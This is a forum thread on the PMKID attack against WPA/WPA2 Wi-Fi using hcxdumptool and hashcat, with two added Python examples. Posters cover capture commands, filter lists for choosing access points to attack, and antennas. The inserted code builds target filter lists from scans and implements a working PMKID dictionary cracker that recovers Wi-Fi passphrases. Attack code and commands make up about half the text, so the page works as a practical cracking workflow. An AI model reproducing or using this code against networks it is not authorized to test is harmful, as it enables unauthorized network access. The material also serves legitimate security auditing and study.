New attack on WPA/WPA2 using PMKID
added rcascan (radio channel assignment scan):
$ hcxdumptool -h
--do_rcascan: show radio channel assignment (scan for target access points)

xxxxxxxxxxxx <ESSID 1> [CHANNEL 1]
xxxxxxxxxxxx <ESSID 2> [CHANNEL 7]
xxxxxxxxxxxx <ESSID 3> [CHANNEL 11, AP IN RANGE]

AP IN RANGE means that the access point responded to our request!
If no access point responds, go closer to the access point or improve your equipment!
Is there any use for this (not exactly for pmkid, but for usual wpa2 crack)?

Hi stinky.
No, that is business as usual: WPA-EAPOL-PBKDF2. If we got only M4 of the handshake, we simply ask for the other key messages to retrieve an authorized handshake. That's all - just another attack vector.
But this attack vector will work, even if PMF is enabled.
(08-19-2018, 02:43 AM)slyexe Wrote:
Quote:Thanks for the info. Not sure it answered my question?
Can someone tell me why I am only getting Found handshake AP-LESS, EAPOL TIMEOUT?
I have not seen PMKID Found only handshake found

Thanks Kev

It's because you're not in range of any routers which broadcast the PMK, just as zerobeat has told you.
This attack does not enable clientless attacks on ALL MAKES OF ROUTERS. It's only available if the router is set up to provide you with the proper information for the PMK. The data you have is telling you that you have obtained an AP-less handshake, meaning you are only able to receive a signal strong enough from the client and not the router.
Thanks for the answers. Back to the drawing board and a better antenna. Cheers, Kev
Usually we use panel antennas like these:
or parabolic antennas like this one:
Another driver, tested with hcxdumptool (again Realtek):

[35053.423872] usb 5-4.5: Product: Edimax AC600 USB
[35053.423874] usb 5-4.5: Manufacturer: Realtek

[18:48:32 - 001] xxxxxxxxxxxx -> f0a2259b9825 [FOUND PMKID CLIENT-LESS]
Hello, first of all, thanks for a great share for a new way to get handshakes and PMKIDS.

I don't have any problems running hcxdumptool, hcxpcaptool or hashcat, but I ran into a problem which I can't solve with hcxdumptool.

I wrote this line hcxdumptool -o test.pcapng -i wlan0 --enable_status --filtermode=2 --filterlist=filter.txt

In filter.txt there is one line with the MAC address of the AP which I want to attack.
But when I dump my result with hcxpcaptool, I have the PMKIDs of other APs which were in range, but not the one that I wrote in filter.txt.

Can anybody help me solve this, how to scan exactly just the one AP I want to attack? Thanks
You're running an old version. Please pull latest git commit.
Filter lists are only used in the transmission branch. Using a filter list means that we run active attacks against the entries (filtermode=2) or do not run active attacks against them (filtermode=1). But nevertheless hcxdumptool is still a passive dumper and will capture all information it receives.

The last version has some more options:
--do_rcascan: show radio channel assignment (scan for target access points)
you should disable auto scrolling in your terminal settings
--save_rcascan=<file>: output rca scan list to file when hcxdumptool terminated
--save_rcascan_raw=<file>: output file in pcapngformat
unfiltered packets
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)

Rca scan will show you whether access points are in range or not. We do not measure the signal strength, because these values are not meaningful. Instead we send a request and look for a response.
Well, there is no longer any need to run airodump-ng to retrieve a target list (as shown in some YouTube video tutorials).
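To tie the two posts above together (the rcascan listing at the top of the thread and the filter list semantics just explained), here is an added example that is not part of the thread and not code from hcxtools: it parses a rcascan listing laid out like the one in the post, keeps only the APs marked AP IN RANGE (the ones that actually answered), and writes them out as a filter list with one 12-hex-digit MAC per line, the same form the poster used for filter.txt. The sample listing, MACs and ESSIDs are constructed for the example; the exact rcascan line layout of your hcxdumptool build may differ, so check it against the regex before relying on it.

```python
import re
from typing import Iterable, List, NamedTuple, Optional, Set

# Constructed sample of --do_rcascan output, laid out like the listing in the
# post above (MAC as 12 hex digits, <ESSID>, then the channel bracket with an
# optional "AP IN RANGE" marker). Hypothetical MACs/ESSIDs, not a real scan.
SAMPLE_RCASCAN = """\
0011223344aa <HomeNet> [CHANNEL 1]
0011223344bb <CoffeeShop> [CHANNEL 7]
0011223344cc <TargetAP> [CHANNEL 11, AP IN RANGE]
0011223344dd <Office-5G> [CHANNEL 36, AP IN RANGE]
"""


class ApEntry(NamedTuple):
    mac: str        # 12 lowercase hex digits, no separators
    essid: str
    channel: int
    in_range: bool  # True only if the AP answered our request


# One AP per line; the flags group catches ", AP IN RANGE" when present.
LINE_RE = re.compile(
    r"^(?P<mac>[0-9a-fA-F]{12})\s+<(?P<essid>.*?)>\s+"
    r"\[CHANNEL\s+(?P<channel>\d+)(?P<flags>[^\]]*)\]\s*$"
)


def parse_rcascan(text: str) -> List[ApEntry]:
    """Parse a rcascan listing; lines that are not AP entries are skipped."""
    entries: List[ApEntry] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        entries.append(ApEntry(
            mac=m["mac"].lower(),
            essid=m["essid"],
            channel=int(m["channel"]),
            in_range="AP IN RANGE" in m["flags"],
        ))
    return entries


def build_filterlist(entries: Iterable[ApEntry],
                     only_in_range: bool = True,
                     essids: Optional[Set[str]] = None) -> str:
    """Return filter.txt contents: one AP MAC per line, 12 hex digits.

    With --filtermode=2 hcxdumptool runs its active attacks only against these
    MACs; everything else in range is still captured passively.
    """
    selected = [
        e for e in entries
        if (not only_in_range or e.in_range)
        and (essids is None or e.essid in essids)
    ]
    return "".join(f"{e.mac}\n" for e in selected)


def channels_for(entries: Iterable[ApEntry]) -> List[int]:
    """Sorted set of channels the selected APs sit on (useful to narrow the scan)."""
    return sorted({e.channel for e in entries})


if __name__ == "__main__":
    aps = parse_rcascan(SAMPLE_RCASCAN)
    reachable = [e for e in aps if e.in_range]
    print("in range:", [(e.essid, e.channel) for e in reachable])
    with open("filter.txt", "w") as fh:
        fh.write(build_filterlist(aps))
    print("channels:", channels_for(reachable))
```

The resulting filter.txt is then passed as `--filterlist=filter.txt --filtermode=2`. Note that, as explained above, this only restricts which APs are actively attacked; the PMKIDs of other APs that happen to be heard will still appear in the dump, so the parsed result should be filtered by MAC again after conversion with hcxpcaptool.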
If I want to use this new method, it seems to me that I need to know the length of the password and the type of characters in the password and where they are located. Is that correct ?
(08-22-2018, 02:00 PM)SP2005 Wrote: Is that correct?

No. Please review hashcat's attack modes and their usages.
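As an added illustration of what that dictionary attack actually checks (this is example code written for this page, not code from the thread, hashcat or hcxtools): for each candidate passphrase the PMK is derived with PBKDF2-HMAC-SHA1 over the ESSID (4096 iterations, 32 bytes), and the PMKID is the first 128 bits of HMAC-SHA1 over "PMK Name" || MAC_AP || MAC_STA, per IEEE 802.11i. A candidate that reproduces the captured PMKID is the passphrase; no knowledge of its length or character set is needed beyond the wordlist itself. The hash line format used here, `pmkid*mac_ap*mac_sta*essid_hex`, is the one hcxpcaptool writes for hashcat's PMKID mode; the MACs, ESSID, passphrase and wordlist below are constructed for the example.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, 4096, 32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): first 16 bytes."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def make_16800_line(passphrase: str, essid: bytes, mac_ap: bytes, mac_sta: bytes) -> str:
    """Build a hash line in hcxpcaptool's PMKID format: pmkid*mac_ap*mac_sta*essid_hex.

    Only used here to construct a sample; a real line comes from a capture.
    """
    pmkid = pmkid_from_pmk(pmk_from_passphrase(passphrase, essid), mac_ap, mac_sta)
    return "*".join(x.hex() for x in (pmkid, mac_ap, mac_sta, essid))


def parse_16800_line(line: str) -> Tuple[bytes, bytes, bytes, bytes]:
    """Split a hash line into (pmkid, mac_ap, mac_sta, essid) and sanity-check sizes."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    pmkid, mac_ap, mac_sta = (bytes.fromhex(h) for h in (pmkid_hex, ap_hex, sta_hex))
    if len(pmkid) != 16 or len(mac_ap) != 6 or len(mac_sta) != 6:
        raise ValueError("malformed PMKID hash line")
    return pmkid, mac_ap, mac_sta, bytes.fromhex(essid_hex)


def crack_pmkid(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Straight dictionary attack: return the first candidate that matches, else None."""
    pmkid, mac_ap, mac_sta, essid = parse_16800_line(line)
    for candidate in wordlist:
        # WPA2 passphrases are 8..63 characters; anything else cannot be the key.
        if not 8 <= len(candidate) <= 63:
            continue
        pmk = pmk_from_passphrase(candidate, essid)
        if pmkid_from_pmk(pmk, mac_ap, mac_sta) == pmkid:
            return candidate
    return None


# Constructed sample: hypothetical AP/client MACs, ESSID and passphrase, not a real capture.
SAMPLE_LINE = make_16800_line(
    "correct horse", b"TargetAP",
    bytes.fromhex("0011223344cc"), bytes.fromhex("aabbccddeeff"),
)
SAMPLE_WORDLIST = ["password", "letmein", "12345678", "correct horse", "TargetAP2018"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered:", crack_pmkid(SAMPLE_LINE, SAMPLE_WORDLIST))
```

The cost is entirely in PBKDF2 (4096 HMAC-SHA1 rounds per candidate), which is why this is done on GPU with hashcat rather than in Python; the logic is the same, and rule-based or mask attacks only change how the candidate list is generated, not how each candidate is checked.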